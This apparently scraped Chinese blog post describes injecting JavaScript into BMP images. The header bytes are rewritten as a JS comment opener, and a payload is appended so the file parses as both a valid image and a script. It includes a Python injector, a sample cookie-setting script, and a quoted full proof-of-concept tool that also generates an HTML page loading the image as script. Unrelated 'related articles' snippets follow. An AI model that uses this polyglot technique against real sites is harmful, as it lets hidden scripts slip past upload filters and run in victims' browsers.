1. 将原BMP文件的第三,第四字节替换为\x2F\x2A, 对应js中的注释符号/*
BMP文件的第三、四、五、六字节表示BMP文件的大小
2. 在BMP文件末尾添加
(1)\xFF
(2)\x2A\x2F,对应的js中的注释符号*/
(3)\x3D\x31\x3B,对应的=1;  是为了伪造成BMP格式
(4)定制的JS代码

fname = "hack.bmp"

pfile = open(fname,"r+b")

buff = pfile.read()

buff.replace(b'\x2A\x2F',b'\x00\x00')

pfile.close()

pfile = open(fname,"w+b")

pfile.write(buff)

pfile.seek(2,0)

pfile.write(b'\x2F\x2A')

pfile.close()

pfile = open(fname,"a+b")

pfile.write(b'\xFF\x2A\x2F\x3D\x31\x3B')

pfile.write(open('hello.js',"rb").read())

pfile.close()

js代码:

names ='id';

value = 'cjx';

var todauDate  = new Date();

todauDate.setHours(todauDate.getDate()+7)

document.cookie = names + "="+escape(value)+";path=/ expires = "+ todauDate.toGMTString()+"";

alert(document.cookie)

引用另一个大佬写的:

https://marcoramilli.blogspot.com/2013/10/hacking-through-images.html

#!/usr/bin/env python2

#============================================================================================================#

#======= Simply injects a JavaScript Payload into a BMP. ====================================================#

#======= The resulting BMP must be a valid (not corrupted) BMP. =============================================#

#======= Author: marcoramilli.blogspot.com ==================================================================#

#======= Version: PoC (don't even think to use it in development env.) ======================================#

#======= Disclaimer: ========================================================================================#

#THIS SOFTWARE IS PROVIDED BY THE AUTHOR "AS IS" AND ANY EXPRESS OR

#IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED

#WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE

#DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,

#INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES

#(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR

                                #SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)

                                #HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,

#STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING

#IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE

#POSSIBILITY OF SUCH DAMAGE.

#===========================================================================================================#

import argparse

import os

#---------------------------------------------------------

def _hexify(num):

    """

    Converts and formats to hexadecimal

    """

    num = "%x" % num

    if len(num) % 2:

        num = ''+num

    return num.decode('hex')

#---------------------------------------------------------

#Example payload: "var _0xe428=[\""+ b'\x48\x65\x6C\x6C\x6F\x20\x57\x6F\x72\x6C\x64' + "\"]

#;alert(_0xe428[0]);"

def _generate_and_write_to_file(payload, fname):

    """

    Generates a fake but valid BMP within scriting

    """

    f = open(fname, "wb")

    header = (b'\x42\x4D'  #Signature BM

                        b'\x2F\x2A\x00\x00' #Header File size, but encoded as /* <-- Yes it's a valid header

                        b'\x00\x00\x00\x00' #Reserved

                        b'\x00\x00\x00\x00' #bitmap data offset

                        b''+ _hexify( len(payload) ) + #bitmap header size

                      b'\x00\x00\x00\x14' #width 20pixel .. it's up to you

                        b'\x00\x00\x00\x14' #height 20pixel .. it's up to you

                      b'\x00\x00' #nb_plan

                        b'\x00\x00' #nb per pixel

                        b'\x00\x10\x00\x00' #compression type

                        b'\x00\x00\x00\x00' #image size .. its ignored

                        b'\x00\x00\x00\x01' #Horizontal resolution

                        b'\x00\x00\x00\x01' #Vertial resolution

                        b'\x00\x00\x00\x00' #number of colors

                        b'\x00\x00\x00\x00' #number important colors

                        b'\x00\x00\x00\x80' #palet colors to be complient

                        b'\x00\x80\xff\x80' #palet colors to be complient

                        b'\x80\x00\xff\x2A' #palet colors to be complient

                        b'\x2F\x3D\x31\x3B' #*/=1;

                        )

    # I made this explicit, step by step .

    f.write(header)

    f.write(payload)

    f.close()

    return True

#---------------------------------------------------------

def _generate_launching_page(f):

    """

    Creates the HTML launching page

    """

    htmlpage ="""

                                <html>

                                <head><title>Opening an image</title> </head>

                                <body>

                                    <img src=\"""" + f + """\"\>

                                    <script src= \"""" + f + """\"> </script>

                                </body>

                                </html>

                        """

    html = open("run.html", "wb")

    html.write(htmlpage);

    html.close()

    return True

#---------------------------------------------------------

def _inject_into_file(payload, fname):

    """

    Injects the payload into existing BMP

    NOTE: if the BMP contains \xFF\x2A might caouse issues

    """

    # I know, I can do it all in memory and much more fast.

    # I wont do it here.

    f = open(fname, "r+b")

    b = f.read()

    b.replace(b'\x2A\x2F',b'\x00\x00')

    f.close()

    f = open(fname, "w+b")

    f.write(b)

    f.seek(2,0)

    f.write(b'\x2F\x2A')

    f.close()

    f = open(fname, "a+b")

    f.write(b'\xFF\x2A\x2F\x3D\x31\x3B')

    f.write(payload)

    f.close()

    return True

#---------------------------------------------------------

if __name__ == "__main__":

    parser = argparse.ArgumentParser()

    parser.add_argument("filename",help="the bmp file name to be generated/or infected")

    parser.add_argument("js_payload",help="the payload to be injected. For exmample: \"alert(\"test\");\"")

    parser.add_argument("-i", "--inject-to-existing-bmp", action="store_true", help="inject into the current bitmap")

    args = parser.parse_args()

    print("""

                    |======================================================================================================|

                    | [!] legal disclaimer: usage of this tool for injecting malware to be propagated is illegal.          |

                    | It is the end user's responsibility to obey all applicable local, state and federal laws.            |

                    | Authors assume no liability and are not responsible for any misuse or damage caused by this program  |

                    |======================================================================================================|

                    """)

    if args.inject_to_existing_bmp:

         _inject_into_file(args.js_payload, args.filename)

    else:

        _generate_and_write_to_file(args.js_payload, args.filename)

    _generate_launching_page(args.filename)

    print "[+] Finished!"

python bmp image injection的更多相关文章

  1. python bmp转jpg 且灰度图转彩色

    今天在简书,上看到了一个 bmp转jpg的代码,便记录一下. # coding:utf-8 import os from PIL import Image # bmp 转换为jpg,灰度图转RGB d ...

  2. python模块介绍- xlwt 创建xls文件(excel)

    python模块介绍- xlwt 创建xls文件(excel) 2013-06-24磁针石 #承接软件自动化实施与培训等gtalk:ouyangchongwu#gmail.comqq 37391319 ...

  3. python excel单元格及样式

    python excel单元格及样式: #!/usr/bin/env python # -*- coding: utf-8 -*-” #只对当前文件的中文编码有效 # Filename : Write ...

  4. xlwt 模块 操作excel

    1.xlwt 基本用法 import xlwt #1 新建文件 new_file = open('test.xls', 'w') new_file.close() #2 创建工作簿 wookbook ...

  5. CRLF注入

    CRLF注入 Title: [CVE-2019-9740] Python urllib CRLF injection vulnerability Category: security Stage: r ...

  6. 提取bmp图片的颜色信息,可直接framebuffer显示(c版本与python版本)

    稍微了解了下linux的framebuffer,这是一种很简单的显示接口,直接写入像素信息即可 配置好的内核,会有/dev/fbn 的接口,于是想能否提前生成一个文件,比如logo.fb,里面仅包含像 ...

  7. HTTP Header Injection in Python urllib

    catalogue . Overview . The urllib Bug . Attack Scenarios . 其他场景 . 防护/缓解手段 1. Overview Python's built ...

  8. Python中通过Image的open之后,去show结果打不开bmp图片,无法正常显示图片

    在windows的cmd命令行下,使用Python的PIL库打开并显示一个jpg图片: ? 1 2 3 openedImg = Image.open(saveToFile); print " ...

  9. 简单bmp图片处理工具——python实现

    预备实现功能: 1.读取bmp文件 2.保存bmp文件 3.对bmp图片进行放大.缩小 4.对bmp图片进行灰度化 5.对bmp图片进行旋转 bmp文件格式非常简单,对于我这种初学者来说减少了不少不必 ...

随机推荐

  1. 真的懂了:TCP协议中的三次握手和四次挥手(关闭连接时, 当收到对方的FIN报文时, 仅仅表示对方不在发送数据了, 但是还能接收数据, 己方也未必全部数据都发送对方了。相当于一开始还没接上话不要紧,后来接上话以后得让人把话讲完)

    一.TCP报文格式 下面是TCP报文格式图: (1) 序号, Seq(Sequence number), 占32位,用来标识从TCP源端向目的端发送的字节流,发起方发送数据时对此进行标记. (2) 确 ...

  2. 一言不合就写socket的post和get请求(拼内容,然后发出去即可)

    一言不合就写socket的post和get请求.写个桌面程序,利用java写get和post请求.测试成功: SocketReq.java package com.test.CipherIndex; ...

  3. 批处理文件的工具(java+shell为了实现)

    批处理文件的工具(java+shell为了实现) 有一堆语料须要处理一下才干使用,本来应该能够直接用shell脚本直接处理的. 可是对shell脚本不熟,仅仅会简单的一些命令. 因此就利用java+s ...

  4. SICP 锻炼 (1.40)解决摘要

    SICP 锻炼1.40 是一个休闲的工作非常easy,但它看起来很复杂,单的一道题. 题目原题例如以下: 请定义一个过程cubic, 它和newtons-method过程一起使用在以下形式的表达式里: ...

  5. windows8运行zxing源码 生成与解码二维码 详解(含注释与图解可直接运行)

    1 下载zxing2.1 2 本代码配置环境:eclipse.java1.6.windows8.zxing2.1 3 解压后将文件夹里面core/src下面的com文件夹导入到eclipse工程(工程 ...

  6. HTML精确定位:scrollLeft,scrollWidth,clientWidth,offsetWidth完全详细的说明

      HTML:scrollLeft,scrollWidth,clientWidth,offsetWidth具体指完全解释究竟哪里的距离scrollHeight: 获取对象的高度滚动. scrollLe ...

  7. Spring Boot MyBatis 通用Mapper插件集成 good

    看本文之前,请确保你已经在SpringBoot中集成MyBatis,并能正常使用.如果没有,那么请先移步 http://blog.csdn.net/catoop/article/details/505 ...

  8. 【Linux】使用crontab,让linux定时执行shell脚本

    阅读目录 1. cron服务[Ubuntu环境] 2. crontab用法 3. vim编辑crontab文件 4.Cron各项描述 5.例子解释 Linux中,周期执行的任务一般由cron这个守护进 ...

  9. window下golang生成静态库给C语言调用

    buidmod为c-archive能在window下生成 ,c-shared则不行 1.golang生成c-archive静态库 main.go package main import "C ...

  10. Ubuntu设置MySQL允许远程访问

    1.注释bind-address = 127.0.0.1. 代码如下: > sudo vim /etc/mysql/mysql.conf.d/mysqld.cnf 将bind-address = ...